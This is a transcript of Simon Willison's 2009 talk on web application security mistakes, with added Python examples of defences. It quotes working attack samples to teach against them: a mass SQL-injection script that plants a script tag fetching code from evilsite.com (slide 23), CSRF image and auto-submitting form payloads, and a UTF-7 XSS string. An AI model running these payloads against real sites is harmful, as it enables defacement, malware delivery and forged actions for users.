This document summarizes Simon Willison's talk on web app security vulnerabilities and lessons learned from past mistakes. It discusses cross-site scripting (XSS) vulnerabilities that allow attackers to steal users' cookies or show fake login pages. It also covers SQL injection attacks, cross-site request forgery (CSRF), and how even features like CSS can be exploited. Past incidents like Samy's MySpace worm and the Google UTF-7 hole are examined to illustrate the dangers if vulnerabilities are left unaddressed. The talk emphasizes following best practices like parameterization and CSRF tokens to prevent common exploits.
Web App Security Horror Stories
1. Web App Security
Horror Stories
Simon Willison, 6th March 2009
Saturday, 7 March 2009
2. This talk is about
learning from other
people’s mistakes
3. XSS
(cross site scripting)
4. Rule one:
Never let anyone
inject their JavaScript
into your page
5. If you have an XSS hole, I can
• Steal your users’ cookies and log in as them
• Embed malware and drive-by downloads
• Show a fake phishing login page on your site
• Perform any action as if I was your user
8. samy is my hero
http://namb.la/popular/
9. MySpace customisation
was “kind of a mistake”
http://bit.ly/myspace-mistake
10. A social network worm
• When you viewed Samy’s profile...
• JS makes you add him as a friend
• JS uses XMLHttpRequest to add his
exploit to YOUR profile as well
11. 4th October 2005
12:34 pm: You have 73 friends
I decided to release my little popularity program. I'm going
to be famous... among my friends.
1:30 am: You have 73 friends and 1 friend request
One of my friends' girlfriend looks at my profile. She's
obviously checking me out. I approve her inadvertent friend
request and go to bed grinning.
8:35 am: You have 74 friends and 221 friend requests
Woah. I did not expect this much. I'm surprised it even
worked.. 200 people have been infected in 8 hours. That
means I'll have 600 new friends added every day. Woah.
9:30 am: You have 74 friends and 480 friend requests
Oh wait, it's exponential, isn't it. Shit.
17. The UTF-7 hole
• Google’s 404 pages didn't specify a charset
• IE inspected the first 4096 bytes to “guess”
the encoding of the page
• UTF-7 XSS attacks slipped through Google's
XSS filters but were executed by IE
http://shiflett.org/blog/2005/dec/googles-xss-vulnerability
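An added example, not from the slides, modelling why the UTF-7 hole worked and why pinning the charset closes it. The client model (sniff UTF-7 when a body contains "+...-" runs) is a deliberate simplification of IE's behaviour, not its real algorithm, and the 404 body is constructed.

```python
import re

# Constructed 404 body: to an ASCII/UTF-8 reader it contains no "<" at all,
# but decoded as UTF-7 "+ADw-" is "<" and "+AD4-" is ">".
UTF7_BODY = b"Not found: +ADw-script+AD4-+ADw-/script+AD4-"

SCRIPT_TAG = re.compile(r"<\s*script", re.IGNORECASE)


def server_filter_flags(body):
    """Output filter that inspects the bytes as sent: the kind of filter
    that let the UTF-7 payload through."""
    return bool(SCRIPT_TAG.search(body.decode("ascii", errors="replace")))


def browser_sees(body, declared_charset=None):
    """Simplified client model (assumption, not IE's real sniffer): a declared
    charset is honoured; with none, a body holding UTF-7 shift sequences
    ('+...-') is decoded as UTF-7, otherwise as UTF-8."""
    if declared_charset:
        return body.decode(declared_charset, errors="replace")
    if re.search(rb"\+[A-Za-z0-9+/]+-", body):
        return body.decode("utf-7", errors="replace")
    return body.decode("utf-8", errors="replace")


def script_would_run(body, declared_charset=None):
    """True when the text the browser actually renders contains a script tag."""
    return bool(SCRIPT_TAG.search(browser_sees(body, declared_charset)))


def content_type_header():
    """The fix: always pin the charset so the client never has to guess."""
    return ("Content-Type", "text/html; charset=utf-8")


if __name__ == "__main__":
    print("filter flagged it:", server_filter_flags(UTF7_BODY))       # False
    print("runs without charset:", script_would_run(UTF7_BODY))        # True
    print("runs with charset:", script_would_run(UTF7_BODY, "utf-8"))  # False
```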
18. You can’t trust CSS either
• HTC in IE and XBL in Mozilla are both vectors for
JavaScript attacks
• A “position: absolute” hack was used to steal 30,000
MySpace passwords last year
http://community.livejournal.com/lj_dev/708069.html
http://www.securiteam.com/securitynews/6O00M0AHFW.html
20. Inexcusable.
Use parameterised
queries, or an ORM
21. If you’re gluing SQL
together using string
appends
22. Bad (even though it's secure):
$sql = "select * from users where nick = '"
. mysql_real_escape_string($username) . "'";
Good:
$sql = build_query(
"select * from users where nick = ?", $nick
);
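An added example (not from the slides) that runs the slide's two shapes side by side against a constructed in-memory SQLite table, using Python's standard sqlite3 module rather than the PHP build_query helper shown above. The string-glued version is shown without the escaping call, to make plain that escaping was the only thing holding it together.

```python
import sqlite3


def make_db():
    """Constructed in-memory users table standing in for the real one."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (id integer primary key, nick text)")
    conn.executemany("insert into users (nick) values (?)",
                     [("simon",), ("o'brien",), ("samy",)])
    return conn


def lookup_by_append(conn, nick):
    """The slide's 'bad' shape with the escaping call left out: the query is
    glued together from strings, so the value is parsed as SQL."""
    sql = "select nick from users where nick = '" + nick + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterised(conn, nick):
    """The slide's 'good' shape: the driver binds the value after parsing,
    so whatever the nick contains can only be compared, never executed."""
    rows = conn.execute("select nick from users where nick = ?", (nick,))
    return [row[0] for row in rows]


def compare(nick):
    """Run both lookups on the same input; report the appended version's
    result, or the error it raised, next to the parameterised result."""
    conn = make_db()
    try:
        appended = lookup_by_append(conn, nick)
    except sqlite3.OperationalError as err:
        appended = "error: " + str(err)
    return {"appended": appended,
            "parameterised": lookup_parameterised(conn, nick)}


if __name__ == "__main__":
    print(compare("simon"))        # both find simon
    print(compare("o'brien"))      # appended: syntax error; parameterised: ["o'brien"]
    print(compare("' or '1'='1"))  # appended: every user; parameterised: []
```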
23. Mass XSS via SQL injection
DECLARE @T varchar(255), @C varchar(255);
DECLARE Table_Cursor CURSOR FOR
SELECT a.name, b.name
FROM sysobjects a, syscolumns b
WHERE a.id = b.id AND a.xtype = 'u' AND
(b.xtype = 99 OR b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167);
OPEN Table_Cursor;
FETCH NEXT FROM Table_Cursor INTO @T, @C;
WHILE (@@FETCH_STATUS = 0) BEGIN
EXEC(
'update [' + @T + '] set [' + @C + '] =
rtrim(convert(varchar,[' + @C + ']))+
''<script src=http://evilsite.com/1.js></script>'''
);
FETCH NEXT FROM Table_Cursor INTO @T, @C;
END;
CLOSE Table_Cursor;
DEALLOCATE Table_Cursor;
http://hackademix.net/2008/04/26/mass-attack-faq/
25. “We’ve found CSRF
vulnerabilities in sites that have a
huge incentive to do security
correctly. If you’re in charge of a
website and haven’t specifically
protected against CSRF, chances
are you’re vulnerable”
- Bill Zeller
26. Ever see a link like this?
<a href="http://app.example.com/delete.php?id=1">Delete</a>
27. Now what if I do this:
<img src="http://app.example.com/delete.php?id=1">
<img src="http://app.example.com/delete.php?id=2">
<img src="http://app.example.com/delete.php?id=3">
<img src="http://app.example.com/delete.php?id=4">
<img src="http://app.example.com/delete.php?id=5">
... and trick you into
visiting my site?
28. POST will not save you
<form action="http://app.example.com/delete.php"
method="POST">
<input type="hidden" name="id" value="1">
<input type="submit" value="More kittens please!">
</form>
http://www.flickr.com/photos/fofurasfelinas/9724483/
29. Or submit with JavaScript
<div style="display: none">
<form action="http://app.example.com/delete.php"
method="POST">
<input type="hidden" name="id" value="1">
</form>
</div>
<script>document.forms[0].submit()</script>
30. The Digg exploit
• A few years ago, Digg had no CSRF
protection on their “digg this” button
• The result: self-digging pages!
http://ha.ckers.org/blog/20060615/a-story-that-diggs-itself/
31. The Gmail filter hack
http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/
32. “We believe this is the first CSRF
vulnerability to allow the transfer of funds
from a financial institution.”
http://www.freedom-to-tinker.com/blog/wzeller/
popular-websites-vulnerable-cross-site-request-forgery-attacks
33. Preventing CSRF
• You need to distinguish between form
interactions from your user on your site, and
form interactions from your user on some
other site
• Referrer checking is notoriously unreliable
• Solution: include a form token (Yahoo! calls
this a “crumb”) proving that the post came
from your site
35. Protecting the crumb
• Your crumb is now the only thing protecting
you from CSRF attacks
• This is why XSS is such a big deal
• With XSS, I can steal your crumb and run
riot across your site
• XSS holes are automatically CSRF holes
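An added example, not from the slides, of the crumb approach from slides 33 and 35: the server mints a token bound to the visitor's session with an HMAC, puts it in its own forms, and the delete handler accepts a POST only when that token verifies, ignoring Referer and method entirely. The secret, the one-hour lifetime and the handler shape are assumptions for the example.

```python
import hashlib
import hmac
import secrets
import time
from html import escape
from urllib.parse import parse_qs

# Constructed per-deployment secret; load it from config in real use.
SERVER_SECRET = secrets.token_bytes(32)
CRUMB_TTL = 3600  # seconds a crumb stays valid (assumed value)


def _mac(session_id, ts):
    msg = f"{session_id}:{ts}".encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()


def make_crumb(session_id, now=None):
    """Crumb bound to this session and a timestamp. Only the server can mint
    one, and only a page served to this session carries it."""
    ts = int(time.time() if now is None else now)
    return f"{ts}:{_mac(session_id, ts)}"


def crumb_is_valid(session_id, crumb, now=None):
    """Reject missing, malformed, foreign-session, expired or forged crumbs."""
    try:
        ts_text, mac = crumb.split(":", 1)
        ts = int(ts_text)
    except (AttributeError, ValueError):
        return False
    age = int(time.time() if now is None else now) - ts
    if not 0 <= age <= CRUMB_TTL:
        return False
    # Constant-time comparison so the MAC cannot be guessed byte by byte.
    return hmac.compare_digest(_mac(session_id, ts), mac)


def render_delete_form(session_id, item_id):
    """The form your own site serves: it carries the crumb as a hidden field.
    A form on someone else's site has no way to obtain this value."""
    return (
        '<form action="/delete.php" method="POST">'
        f'<input type="hidden" name="id" value="{escape(str(item_id))}">'
        f'<input type="hidden" name="crumb" value="{make_crumb(session_id)}">'
        '<input type="submit" value="Delete"></form>'
    )


def handle_delete(session_id, body, now=None):
    """POST /delete.php: the crumb alone decides; neither the Referer header
    nor the request method is trusted. Returns an HTTP status code."""
    fields = parse_qs(body)
    crumb = fields.get("crumb", [""])[0]
    if not crumb_is_valid(session_id, crumb, now):
        return 403
    return 200


if __name__ == "__main__":
    sid = "sess-1"
    print(handle_delete(sid, "id=1&crumb=" + make_crumb(sid)))  # 200, from your own form
    print(handle_delete(sid, "id=1"))                           # 403, the slide-28 form
```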
56. How did they do it?
They guessed the URL
57. The Twitter hack
• A bored teenager ran a brute force
attack against a popular Twitter user
• "happiness" is a dictionary word
• She happened to be Twitter staff, with
admin access
59. Keep admin accounts
separate from regular
user accounts
60. crossdomain.xml
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
Putting this at example.com/crossdomain.xml allows Flash applets
on other sites to read your pages and steal your crumbs
Flash can even fake an X-Requested-With: XMLHttpRequest header
That’s why Flickr use api.flickr.com/crossdomain.xml instead
62. YouTube/Gmail combo attack!
<allow-access-from domain="*.google.com" />
1. Attacker emails a special SWF to a Gmail account they control
and locates the attachment download URL on google.com
2. Logged-in YouTube user visits an attacker controlled page
3. Attacker forces their victim to authenticate to the attacker's
Gmail account (using login CSRF)
4. Attacker embeds SWF from the Gmail account into the web page
5. Attacker now has read/write access on YouTube.com as the
victim's account
http://jeremiahgrossman.blogspot.com/2008/09/i-used-to-know-what-you-watched-on.html
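An added example, not from the slides, covering both the crossdomain.xml slide and the YouTube/Gmail one: a small audit of a crossdomain.xml body that flags the blanket wildcard, the subdomain wildcard that let a Gmail-hosted SWF in, the secure="false" and header-forwarding relaxations, and notes the Flickr-style fix of serving a permissive policy from a separate API host. The three policies are constructed; the severities are this example's own scale.

```python
import xml.etree.ElementTree as ET

# Constructed policies: the slide's own, the *.google.com one, and a narrow one.
SLIDE_POLICY = """<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>"""

GOOGLE_STYLE_POLICY = """<cross-domain-policy>
<allow-access-from domain="*.google.com" />
</cross-domain-policy>"""

NARROW_POLICY = """<cross-domain-policy>
<allow-access-from domain="widgets.partner.example" />
</cross-domain-policy>"""


def audit_policy(xml_text, serves_sessions=True):
    """Return (severity, message) findings for one crossdomain.xml body.
    serves_sessions is True when the host serving the file also sets the
    session cookie, i.e. it is the main site rather than an API host."""
    root = ET.fromstring(xml_text)
    if root.tag != "cross-domain-policy":
        return [("error", "root element is not <cross-domain-policy>")]
    findings = []
    for rule in root.iter("allow-access-from"):
        domain = rule.get("domain", "")
        if domain == "*":
            findings.append(("high", 'domain="*": a SWF on any site can read this '
                             "host's pages, and so the crumbs in them, as the logged-in user"))
        elif domain.startswith("*."):
            findings.append(("medium", f'domain="{domain}": trusts every subdomain, '
                             "including any that serves user-uploaded files (the Gmail attachment case)"))
        # secure="false" lets a plain-http SWF read an https host (Adobe policy attribute).
        if rule.get("secure", "true").lower() == "false":
            findings.append(("medium", f'secure="false" for {domain}: plain-http SWFs may read this https host'))
    for rule in root.iter("allow-http-request-headers-from"):
        if rule.get("domain") == "*" and rule.get("headers") == "*":
            findings.append(("high", "any origin may add request headers, so "
                             "X-Requested-With proves nothing about who sent the request"))
    if serves_sessions and any(sev == "high" for sev, _ in findings):
        findings.append(("info", "serve a permissive policy from a separate API host "
                         "(the api.flickr.com approach), not from the host that sets session cookies"))
    return findings


if __name__ == "__main__":
    for name, policy in [("slide", SLIDE_POLICY), ("google-style", GOOGLE_STYLE_POLICY),
                         ("narrow", NARROW_POLICY)]:
        print(name, audit_policy(policy))
```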
63. No matter how hard you try, you
can’t secure your site 100%
There’s always a chance a
browser, plugin or compromised
client machine will screw
everything up anyway
64. ... and 70% of users will give
their password to a stranger in
exchange for a bar of chocolate
http://news.bbc.co.uk/1/hi/technology/3639679.stm